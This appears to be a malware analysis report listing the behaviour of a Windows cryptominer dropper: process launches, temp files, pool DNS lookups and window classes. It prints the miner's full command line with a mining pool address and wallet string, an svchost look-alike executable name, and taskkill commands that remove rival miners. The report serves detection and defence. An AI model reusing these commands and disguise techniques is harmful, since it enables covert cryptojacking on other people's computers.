Technical Information
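- '%TEMP%\RarSFX0\svchosts3.exe' -o xmr.crypto-pool.fr:3333 -u 42gsjPg7BpvSFBjhxGS9NFXy2XPtPU1DpjGankKeRtM9YZ2YmvfF6X4gzWw3SLButodRWeSnnzAexLPiCraMvF6tRFdRXxL -t 8
  (The options appear to follow the usual CPU-miner command-line convention: -o is the pool address, -u the account or wallet string, -t the thread count. The executable runs from a self-extractor folder under %TEMP% and its name resembles the system svchost.exe.)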
- '<SYSTEM32>\find.exe' /i "svchosts.exe"
- '<SYSTEM32>\taskkill.exe' /f /t /im minerd.exe
- '<SYSTEM32>\taskkill.exe' /f /t /im svchosts3.exe
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\RarSFX0\s.bat" "
- '<SYSTEM32>\taskkill.exe' /f /t /im svchosts.exe
- '<SYSTEM32>\tasklist.exe' /V /S localhost /U %USERNAME%
- File: %TEMP%\RarSFX0\s.bat
- File: %TEMP%\RarSFX0\svchosts3.exe
- Network endpoint: 'xm#.##ypto-pool.fr':3333 (the host name is partially masked with '#' in this listing)
- DNS ASK xm#.##ypto-pool.fr
- ClassName: '' WindowName: ''
- ClassName: 'Shell_TrayWnd' WindowName: ''
- ClassName: 'EDIT' WindowName: ''